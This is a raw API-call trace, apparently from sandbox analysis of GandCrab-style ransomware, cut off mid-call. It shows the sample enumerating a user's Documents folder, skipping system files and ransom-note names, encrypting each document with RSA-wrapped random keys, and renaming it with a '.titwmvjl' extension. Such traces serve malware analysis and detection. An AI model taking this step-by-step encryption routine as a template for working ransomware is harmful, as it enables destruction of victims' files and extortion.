[0092.008] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.008] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".docx ") returned 6 [0092.008] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.009] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.009] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\UeCPKGD3se3f1.docx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\uecpkgd3se3f1.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ac [0092.009] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.009] ReadFile (in: hFile=0x2ac, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f470*=0x21c, lpOverlapped=0x0) returned 1 [0092.010] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.010] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.010] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0092.010] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0092.011] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0092.011] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0092.011] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f42c | out: pbBuffer=0x259f42c) returned 1 [0092.011] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.011] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0092.011] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.011] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.011] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0092.012] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0092.012] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0092.012] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0092.012] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f44c | out: pbBuffer=0x259f44c) returned 1 [0092.012] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.013] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0092.013] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.013] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.013] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0092.013] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.013] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x5036f8) returned 1 [0092.013] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.014] CryptGetKeyParam (in: hKey=0x5036f8, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0092.014] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.014] CryptEncrypt (in: hKey=0x5036f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0092.014] GetLastError () returned 0x0 [0092.014] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.014] CryptDestroyKey (hKey=0x5036f8) returned 1 [0092.014] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.014] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0092.014] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.014] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0092.015] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.015] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x5036f8) returned 1 [0092.015] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.015] CryptGetKeyParam (in: hKey=0x5036f8, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0092.015] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.015] CryptEncrypt (in: hKey=0x5036f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0092.016] GetLastError () returned 0x0 [0092.016] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.016] CryptDestroyKey (hKey=0x5036f8) returned 1 [0092.016] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.016] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0092.016] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0092.016] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0092.016] ReadFile (in: hFile=0x2ac, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f470*=0xae06, lpOverlapped=0x0) returned 1 [0092.029] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xffff51fa, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.029] WriteFile (in: hFile=0x2ac, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xae06, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f454*=0xae06, lpOverlapped=0x0) returned 1 [0092.030] WriteFile (in: hFile=0x2ac, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f454*=0x21c, lpOverlapped=0x0) returned 1 [0092.032] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.035] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.036] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.036] CloseHandle (hObject=0x2ac) returned 1 [0092.037] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\UeCPKGD3se3f1.docx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\uecpkgd3se3f1.docx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\UeCPKGD3se3f1.docx.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\uecpkgd3se3f1.docx.titwmvjl"), dwFlags=0x1) returned 1 [0092.037] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.037] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0092.037] lstrcmpW (lpString1="vJwuNaFee.doc", lpString2=".") returned 1 [0092.037] lstrcmpW (lpString1="vJwuNaFee.doc", lpString2="..") returned 1 [0092.038] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\", lpString2="vJwuNaFee.doc" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\vJwuNaFee.doc") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\vJwuNaFee.doc" [0092.038] lstrlenW (lpString=".titwmvjl") returned 9 [0092.038] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\vJwuNaFee.doc") returned 45 [0092.038] VirtualAlloc (lpAddress=0x0, dwSize=0x9a, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0092.038] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\vJwuNaFee.doc.titwmvjl") returned 54 [0092.038] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\vJwuNaFee.doc") returned 45 [0092.038] lstrlenW (lpString=".doc") returned 4 [0092.038] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.038] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".doc ") returned 5 [0092.038] lstrcmpiW (lpString1=".doc", lpString2=".titwmvjl") returned -1 [0092.038] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.038] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\vJwuNaFee.doc") returned 45 [0092.038] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\vJwuNaFee.doc") returned 45 [0092.038] lstrcmpiW (lpString1="vJwuNaFee.doc", lpString2="desktop.ini") returned 1 [0092.038] lstrcmpiW (lpString1="vJwuNaFee.doc", lpString2="autorun.inf") returned 1 [0092.038] lstrcmpiW (lpString1="vJwuNaFee.doc", lpString2="ntuser.dat") returned 1 [0092.038] lstrcmpiW (lpString1="vJwuNaFee.doc", lpString2="iconcache.db") returned 1 [0092.038] lstrcmpiW (lpString1="vJwuNaFee.doc", lpString2="bootsect.bak") returned 1 [0092.038] lstrcmpiW (lpString1="vJwuNaFee.doc", lpString2="boot.ini") returned 1 [0092.038] lstrcmpiW (lpString1="vJwuNaFee.doc", lpString2="ntuser.dat.log") returned 1 [0092.038] lstrcmpiW (lpString1="vJwuNaFee.doc", lpString2="thumbs.db") returned 1 [0092.039] lstrcmpiW (lpString1="vJwuNaFee.doc", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0092.039] lstrcmpiW (lpString1="vJwuNaFee.doc", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0092.039] lstrcmpiW (lpString1="vJwuNaFee.doc", lpString2="KRAB-DECRYPT.html") returned 1 [0092.039] lstrcmpiW (lpString1="vJwuNaFee.doc", lpString2="CRAB-DECRYPT.html") returned 1 [0092.039] lstrcmpiW (lpString1="vJwuNaFee.doc", lpString2="KRAB-DECRYPT.txt") returned 1 [0092.039] lstrcmpiW (lpString1="vJwuNaFee.doc", lpString2="CRAB-DECRYPT.txt") returned 1 [0092.039] lstrcmpiW (lpString1="vJwuNaFee.doc", lpString2="ntldr") returned 1 [0092.039] lstrcmpiW (lpString1="vJwuNaFee.doc", lpString2="NTDETECT.COM") returned 1 [0092.039] lstrcmpiW (lpString1="vJwuNaFee.doc", lpString2="Bootfont.bin") returned 1 [0092.039] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\vJwuNaFee.doc") returned 45 [0092.039] lstrlenW (lpString=".doc") returned 4 [0092.039] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.039] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".doc ") returned 5 [0092.039] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.039] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.039] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\vJwuNaFee.doc" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\vjwunafee.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ac [0092.040] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.040] ReadFile (in: hFile=0x2ac, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f470*=0x21c, lpOverlapped=0x0) returned 1 [0092.040] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.041] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.041] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0092.041] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0092.041] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0092.041] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0092.041] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f42c | out: pbBuffer=0x259f42c) returned 1 [0092.042] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.042] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0092.042] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.042] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.042] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0092.042] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0092.043] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0092.043] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0092.043] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f44c | out: pbBuffer=0x259f44c) returned 1 [0092.043] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.043] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0092.043] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.043] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.043] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0092.044] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.044] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x503478) returned 1 [0092.044] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.044] CryptGetKeyParam (in: hKey=0x503478, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0092.044] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.044] CryptEncrypt (in: hKey=0x503478, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0092.045] GetLastError () returned 0x0 [0092.045] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.045] CryptDestroyKey (hKey=0x503478) returned 1 [0092.045] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.045] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0092.045] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.045] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0092.045] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.046] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x503338) returned 1 [0092.046] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.046] CryptGetKeyParam (in: hKey=0x503338, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0092.046] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.046] CryptEncrypt (in: hKey=0x503338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0092.046] GetLastError () returned 0x0 [0092.046] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.046] CryptDestroyKey (hKey=0x503338) returned 1 [0092.046] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.046] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0092.046] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0092.047] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0092.047] ReadFile (in: hFile=0x2ac, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f470*=0x78f4, lpOverlapped=0x0) returned 1 [0092.060] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xffff870c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.060] WriteFile (in: hFile=0x2ac, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x78f4, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f454*=0x78f4, lpOverlapped=0x0) returned 1 [0092.061] WriteFile (in: hFile=0x2ac, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f454*=0x21c, lpOverlapped=0x0) returned 1 [0092.062] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.066] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.066] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.066] CloseHandle (hObject=0x2ac) returned 1 [0092.067] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\vJwuNaFee.doc" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\vjwunafee.doc"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\vJwuNaFee.doc.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\vjwunafee.doc.titwmvjl"), dwFlags=0x1) returned 1 [0092.067] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.068] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0092.068] lstrcmpW (lpString1="XvytobGD.xls", lpString2=".") returned 1 [0092.068] lstrcmpW (lpString1="XvytobGD.xls", lpString2="..") returned 1 [0092.068] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\", lpString2="XvytobGD.xls" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\XvytobGD.xls") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\XvytobGD.xls" [0092.068] lstrlenW (lpString=".titwmvjl") returned 9 [0092.068] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\XvytobGD.xls") returned 44 [0092.068] VirtualAlloc (lpAddress=0x0, dwSize=0x98, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0092.068] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\XvytobGD.xls.titwmvjl") returned 53 [0092.068] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\XvytobGD.xls") returned 44 [0092.068] lstrlenW (lpString=".xls") returned 4 [0092.068] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.068] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".xls ") returned 5 [0092.068] lstrcmpiW (lpString1=".xls", lpString2=".titwmvjl") returned 1 [0092.068] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.069] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\XvytobGD.xls") returned 44 [0092.069] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\XvytobGD.xls") returned 44 [0092.069] lstrcmpiW (lpString1="XvytobGD.xls", lpString2="desktop.ini") returned 1 [0092.069] lstrcmpiW (lpString1="XvytobGD.xls", lpString2="autorun.inf") returned 1 [0092.069] lstrcmpiW (lpString1="XvytobGD.xls", lpString2="ntuser.dat") returned 1 [0092.069] lstrcmpiW (lpString1="XvytobGD.xls", lpString2="iconcache.db") returned 1 [0092.069] lstrcmpiW (lpString1="XvytobGD.xls", lpString2="bootsect.bak") returned 1 [0092.069] lstrcmpiW (lpString1="XvytobGD.xls", lpString2="boot.ini") returned 1 [0092.069] lstrcmpiW (lpString1="XvytobGD.xls", lpString2="ntuser.dat.log") returned 1 [0092.069] lstrcmpiW (lpString1="XvytobGD.xls", lpString2="thumbs.db") returned 1 [0092.069] lstrcmpiW (lpString1="XvytobGD.xls", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0092.069] lstrcmpiW (lpString1="XvytobGD.xls", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0092.069] lstrcmpiW (lpString1="XvytobGD.xls", lpString2="KRAB-DECRYPT.html") returned 1 [0092.069] lstrcmpiW (lpString1="XvytobGD.xls", lpString2="CRAB-DECRYPT.html") returned 1 [0092.069] lstrcmpiW (lpString1="XvytobGD.xls", lpString2="KRAB-DECRYPT.txt") returned 1 [0092.069] lstrcmpiW (lpString1="XvytobGD.xls", lpString2="CRAB-DECRYPT.txt") returned 1 [0092.069] lstrcmpiW (lpString1="XvytobGD.xls", lpString2="ntldr") returned 1 [0092.069] lstrcmpiW (lpString1="XvytobGD.xls", lpString2="NTDETECT.COM") returned 1 [0092.069] lstrcmpiW (lpString1="XvytobGD.xls", lpString2="Bootfont.bin") returned 1 [0092.069] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\XvytobGD.xls") returned 44 [0092.069] lstrlenW (lpString=".xls") returned 4 [0092.069] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.069] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".xls ") returned 5 [0092.069] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.069] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.069] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\XvytobGD.xls" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\xvytobgd.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ac [0092.070] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.070] ReadFile (in: hFile=0x2ac, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f470*=0x21c, lpOverlapped=0x0) returned 1 [0092.071] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.071] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.071] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0092.071] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0092.072] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0092.072] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0092.072] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f42c | out: pbBuffer=0x259f42c) returned 1 [0092.072] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.072] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0092.072] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.072] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.072] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0092.073] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0092.073] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0092.073] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0092.073] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f44c | out: pbBuffer=0x259f44c) returned 1 [0092.073] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.073] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0092.073] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.073] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.073] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0092.074] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.074] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x5034f8) returned 1 [0092.074] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.075] CryptGetKeyParam (in: hKey=0x5034f8, 